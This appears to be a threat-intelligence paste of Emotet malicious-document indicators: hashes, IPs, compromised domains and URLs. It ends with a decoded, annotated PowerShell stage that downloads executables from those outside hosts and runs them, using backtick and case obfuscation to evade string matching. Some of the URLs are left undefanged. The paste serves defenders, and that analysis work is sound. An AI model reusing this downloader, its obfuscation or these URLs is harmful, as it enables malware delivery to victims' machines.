paladin316

Emotet_Doc_out_2020-08-18_12_05.txt

Aug 18th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4.  
  5. 4b2c463c130aa9358e9853fd7af4e476c3f9721168623f6befc47050979d936e
  6. 5c8b923944c5816b259806159d34a3d379b2c8f347ef3b69cbc5b18f60637d93
  7. a2abd583b4e4caacffb06a486754338888f244c02fbadfeb9c74b6d0260c25e6
  8. e7007d098ff3b77d307fdffbc2b566e6396298bfb9718bd207a8b377aca0b96a
  9. 8e917ba2db15e3b72b3f9a8c539719993270cb53a0d779cf77c22dab3c48ba14
  10. d2059efbb4bbbb1bbafc82ce09984c631cd46888fa36a570b8e40319766e4c35
  11. cbae984f113307015e9a42c646507cd4fecbc37c1ce7ed2fa9d731fdfff7e00f
  12. aecb14f5fd610dae65d94c788e6451f3f073561c8c00b0b62b4cf9d710c570ed
  13. 78159b47ee6e43a81e5f727e9f01d56700fb22cca0c9f6cde333e91c0130dee3
  14. e284647edaee2ed25f77af25077cf6abe3b9339e1890a0cae20dbfdc5bf1399f
  15. 503c77f99b0c8271cb80a1101e69d6c9060647f7a4a8451c23aae49bd344b634
  16. 14af02c786ea12c4843ad6860839b102eb8e62ee07901297724c921065dc3081
  17. 9f6acf9a0b1abf9481a13650ecdec0e7a9cb7a4c30938c2ffcca8da0934a96d2
  18. e2f0cb86eadbea45515eddee89bc46912333b4bf97129ee3cb33951aae3c3fc4
  19. 5b2f315f6910580a86de6995dc3bb3af0bba726b0292875fbeeb557d17759d57
  20. b4391434a4bd48c6f939fb55a7ed439917514aa935d56b3bf82123bcf44d1d54
  21. 41f1e702b57bab0ebc27e61570867b5417e34c5aa1b9046382207f7f62fd15ad
  22. 5adc805efc11587406fafe7de5332a37288953281fa45d077d79efd4b84a4410
  23. 97c4a455a266f18df4c26ce82ca2dce9c1411c24b190098b54f0ea98299c6025
  24. 7f43631f90c634b619bdcee6c8353e998541fad6790dc63774b1cf0cd1fbed67
  25. 4dba7674a65d6c5e1cd3a1ad7226c21f0b91705ac0a61326e58044947a641cac
  26. ce7f5157d0128d0740ec074ee8db6dd03e234c410111f7aa6832f7adc820cfe0
  27. 8e753065e300156e56580de3e895fe3aa55d7ec678c49eb160e2ca68534519c0
  28. a7c86fe81531f07b7120be70ff6f16519758654ccc7ae3c901cea8d36e3a21c9
  29. 08c50addda3b42db251a58aea5ee64018bd92bee3bccc61fd1f24b8f1b352a69
  30. 26db3179e1151f412ec9d5bb423d2acb8dfd4ef3adf67dc52e98646e1dabbfbc
  31. 1155743b446edd7735d9d8ed8687db0ee01b2230b0e87ba307f6f6a730bb38d2
  32. de7fd9eac5e5ecbf8e793422b73a8ba6efb5b97d1432e902106ea04bacf14a94
  33. 22c0f4e992bbe008bc8662329a78df594f5a5878400732952ef07f4cf83f3e48
  34. b1a5b0c45a385a514d7ee49f36e2df92b90949faf44927ad0a6540f39686a5f4
  35. c05713068f1705d81e3bcdac768839b40dafb7f82ac746d7b3933d60a22b29a8
  36. 94e51fa641e5b3a8e7516bab8ef519893aacd7d2328919f853585ac02e2a9899
  37. 13f007247a133e15c91b87cca369b39cc7b383603cbe773fb626e306a41a99d3
  38. f69601f9864bbeea46bf1889eaa312af133ec9e123070328a9bcebca523498d9
  39. 702c159af504d46bf306ca308aca23869b002d000423b17834506e0465b12df1
  40. 9ba1f593e77d663b73ca37090d03a3fb4b9046b625ff9ec1d00a34893fda3ff0
  41. 5cd6999ce87dc9415eec3e4277509ab4019c0dd0b086f7dd931154108deb6a52
  42. d0f2e774501d0aeea50a4ff21e17e958634c50bc481fff9f01ba41ae7355947c
  43. 63fc7bb7b01996cde65e632380bdd0c32da6c7245e64b85e45bcfcb4fb5e0af4
  44. 3a1b4e159222a6739951372391c9baac6618ca03702238a85423f720225591c6
  45. 6fa1409aee3b7332250c43cf6e6106c62bb9c6efd8f82ad49580164b45aff608
  46. af643dba5886cc3402429f593ef1a71d7cb377f0bca3dad9302fa1803a9b2324
  47. 8e7351f409ea3bafcb21e9b63e826625bd93d365c0feaff265ef7777c0f5e116
  48. ea9dfb49de29351fb9fae1e80177b3ed473f9229e5da8e2ae5eea121deb29760
  49. 77fbb539ddb2abc10dbbd056cd960899d723297cd2a680baba3a8f7180a2c59b
  50. 1e90425ec5f280794dcdf20c9e88789f38d0adb4b2ecfd0a9cdc3996930f52d8
  51. b112d8627b556a0c0ac19e877bdfe439b82cb1a1985603fa5c3a8b3de73a4fe0
  52. 29102965716e1fdfb0e0a9a633c56e9f1a6a17e0c8bcdabdf8efc3f37efd76e6
  53. 7c86327f0deeab1d9dd791f64c58e46fa7efdc401dbabe6013a80fa09fab74a8
  54. 248558f5b8547279882c012169b965765eab106c30275d475e3de2ba02e6c7e6
  55. 4e87fcc221d74df7d333623ad839fced4d060cd1b297adb04bd6f295d83890d3
  56. 6f0f54737b574488c42223ae81bd83ea0da431f0732413951fe4572ca19e6442
  57. 7e2991455103c6991e0b185681b90bc399d56d350e8a3553ec90b5bf6d99f2c1
  58.  
  59.  
  60. IPs:
  61. 162.214.65.60
  62. 167.114.252.85
  63. 173.249.157.230
  64. 45.173.88.33
  65. 68.44.137.144
  66. 69.30.203.214
  67. 83.150.213.216
  68.  
  69. Domains:
  70.  
  71. micromex.com
  72. www.marcovacca.com
  73. www.meltonian.net
  74. mikespub.net
  75. 1kocicikralovstvi.cz
  76. clanspectre.com
  77. www.fantasticz.org
  78. fanction.jp
  79. fourserious.com
  80. fastfoodz.atwebpages.com
  81. defiteqturkiye.com
  82. www.electropixel.com
  83. elevationadvertising.com
  84. etawala.com
  85. diamondbraintutor.com
  86.  
  87. URLs:
  88.  
  89. hxxps://micromex.com/wordpress/fQ4dV31/
  90. hxxp://www.marcovacca.com/img_albums/nzb/
  91. hxxp://www.meltonian.net/AjpEE/
  92. hxxp://mikespub.net/azure/o3J/
  93. hxxp://1kocicikralovstvi.cz/wp-includes/3z/
  94. hxxp://clanspectre.com/0_x9_l86icl169v/
  95. hxxp://www.fantasticz.org/y9p_ibr_oiwq7ke/
  96. hxxp://fanction.jp/assets/9s_yy_qt7jz09ve/
  97. hxxp://fourserious.com/wtof8_t_m9qazq4o2/
  98. hxxp://fastfoodz.atwebpages.com/wp-admin/jb8_k_g9d3v7/
  99. hxxp://defiteqturkiye.com/Uh/
  100. hxxp://www.electropixel.com/Te8qO04/
  101. hxxp://elevationadvertising.com/mobile/cb595319/
  102. hxxp://etawala.com/bae05905/
  103. hxxp://diamondbraintutor.com/wp-includes/2G33O54/
  104.  
  105.  
  106.  
  107.  
  108.  
  109. Decoded Base64 PowerShell:
  # Decoded PowerShell stage from the Emotet maldoc, as transcribed by the paste author.
  # The "NNN." gutter numbers and the hxxp:// defanging are artifacts of the paste, not of
  # the sample. Structure: three near-identical download-and-run attempts. Each one creates
  # %TEMP%\Office2019, walks a list of URLs, and launches the first download whose file
  # length passes a minimum-size check. The many one-off string assignments ($Dq9q9mo,
  # $K1q4pck, $Te4x_ho, ...) are never referenced again - filler / obfuscation.
  # Cmdlet names are invoked via &('...') / .('...') and property names are split with
  # backticks (e.g. "Dow`NL`oA`DfILe" = DownloadFile) so that plain string matching on the
  # script text misses them.
  # Detection value for defenders: powershell.exe creating %TEMP%\Office2019, writing a
  # *.exe there via Net.WebClient.DownloadFile, then Invoke-Item on that path - presumably
  # with an Office application as the parent process (inferred from the maldoc context).
  110. $Dq9q9mo=('Z72yb8r');
  # Stage 1: create %TEMP%\Office2019 (case-mangled path and cmdlet name).
  111. &('new-item') $env:tEMP\OffiCE2019 -itemtype diRecTORy;
  # Backtick-split property is SecurityProtocol: allow TLS 1.0/1.1/1.2 for the download.
  112. [Net.ServicePointManager]::"seCUriTYP`RO`T`OcOl" = ('tls12, tls11, tls');
  113. $Us1p12g = ('Atmgo6');
  114. $K1q4pck=('Gy452hn');
  # Drop path: %TEMP%\Office2019\Atmgo6.exe ([chAR]92 is the backslash, inserted via -F).
  115. $Cs6w69c=$env:temp+(('{0}Office2019{0}')-F[chAR]92)+$Us1p12g+('.exe');
  116. $Te4x_ho=('Wbsphp_');
  117. $I5vpzjq=.('new-object') NeT.WEbCliENt;
  # Candidate payload URLs. In the sample these sit in one string split on [char]42 ('*');
  # the paste shows them one per line. NOTE(review): the first entry is not defanged
  # (https:// rather than hxxps://) unlike the rest of the list.
  118. $J4ev94z=('https://micromex.com/wordpress/fQ4dV31/
  119. hxxp://www.marcovacca.com/img_albums/nzb/
  120. hxxp://www.meltonian.net/AjpEE/
  121. hxxp://mikespub.net/azure/o3J/
  122. hxxp://1kocicikralovstvi.cz/wp-includes/3z/')."S`pliT"([char]42);
  123. $Hit1su0=('Sos_jd2');
  # Try each URL in order; any failure is silently swallowed by the empty catch{} below.
  124. foreach($Z6q9ge4 in $J4ev94z){try{$I5vpzjq."Dow`NL`oA`DfILe"($Z6q9ge4, $Cs6w69c);
  125. $Qqvcwii=('I49ou7k');
  # Only run the file if it is at least 36346 bytes ("Le`NgTh" = Length), then stop looping;
  # presumably a guard against error pages or truncated downloads - inferred.
  126. If ((.('Get-Item') $Cs6w69c)."Le`NgTh" -ge 36346) {&('Invoke-Item')($Cs6w69c);
  127. $Nuszxvh=('V8v1oo3');
  128. break;
  # Two filler assignments run together here (no ';' between them - likely lost in
  # transcription); stage 2 starts on the next line.
  129. $N2259yc=('Ip1xup5')}}catch{}}$Rm1uila=('J93lxs8')$Rsr6itx=('Aug_0s9');
  # Stage 2: same pattern, drop file %TEMP%\Office2019\Lwxms9o.exe, size floor 21054 bytes.
  130. .('new-item') $eNV:TEmP\office2019 -itemtype dIrectory;
  131. [Net.ServicePointManager]::"SEcU`Ri`TyprO`T`oCOL" = ('tls12, tls11, tls');
  132. $A_7oeyb = ('Lwxms9o');
  133. $B8g966r=('T1ubozj');
  134. $Qfjk49e=$env:temp+(('{0}Office2019{0}') -F [cHAR]92)+$A_7oeyb+('.exe');
  135. $Nqki3fv=('Bq0tbzp');
  136. $H_djs3h=&('new-object') neT.weBClient;
  # NOTE(review): the fourth URL below is not defanged (http:// rather than hxxp://).
  137. $Fgqh92j=('hxxp://clanspectre.com/0_x9_l86icl169v/
  138. hxxp://www.fantasticz.org/y9p_ibr_oiwq7ke/
  139. hxxp://fanction.jp/assets/9s_yy_qt7jz09ve/
  140. http://fourserious.com/wtof8_t_m9qazq4o2/
  141. hxxp://fastfoodz.atwebpages.com/wp-admin/jb8_k_g9d3v7/')."sp`LiT"([char]42);
  142. $Ci4lnz9=('Cuii98b');
  143. foreach($H4xit6t in $Fgqh92j){try{$H_djs3h."dOwNLo`A`DFILE"($H4xit6t, $Qfjk49e);
  144. $It5bxgs=('Ix7p80w');
  145. If ((&('Get-Item') $Qfjk49e)."Len`gTh" -ge 21054) {.('Invoke-Item')($Qfjk49e);
  146. $U9g8025=('Dfh9mwg');
  147. break;
  # Same run-together filler as line 129; stage 3 starts on the next line.
  148. $Fhs7oe9=('X015tjf')}}catch{}}$E9e076n=('Ztsak0_')$Yzlxjpj=('Ofl1x67');
  # Stage 3: same pattern, drop file %TEMP%\Office2019\Unrm2w6dd.exe, size floor 20439 bytes.
  149. &('new-item') $EnV:TemP\offiCE2019 -itemtype DIrEcTOry;
  150. [Net.ServicePointManager]::"sE`c`URIt`YPr`OTOC`oL" = ('tls12, tls11, tls');
  151. $Pyzn4nw = ('Unrm2w6dd');
  152. $S0oadp1=('I0jjv9u');
  153. $J5gkdpt=$env:temp+(('{0}Office2019{0}') -f[Char]92)+$Pyzn4nw+('.exe');
  154. $T9e5g24=('Op8k6l5');
  155. $Nzg5f87=.('new-object') net.weBCLIeNt;
  # NOTE(review): the fourth URL below is not defanged (http:// rather than hxxp://).
  156. $Nw1lwdn=('hxxp://defiteqturkiye.com/Uh/
  157. hxxp://www.electropixel.com/Te8qO04/
  158. hxxp://elevationadvertising.com/mobile/cb595319/
  159. http://etawala.com/bae05905/
  160. hxxp://diamondbraintutor.com/wp-includes/2G33O54/')."SPL`iT"([char]42);
  161. $Onzlotc=('Art8zt3');
  162. foreach($Ul3jyv7 in $Nw1lwdn){try{$Nzg5f87."d`ow`NLoaD`FilE"($Ul3jyv7, $J5gkdpt);
  163. $Tn78_j1=('Dyqytpl');
  164. If ((.('Get-Item') $J5gkdpt)."l`En`GTh" -ge 20439) {&('Invoke-Item')($J5gkdpt);
  165. $B1iij_h=('F51i7ca');
  166. break;
  # End of the decoded stage; nothing follows the final filler assignment.
  167. $Jssq8ik=('Tf2cpnv')}}catch{}}$M3x5uls=('Rb3q_2j')
  168.  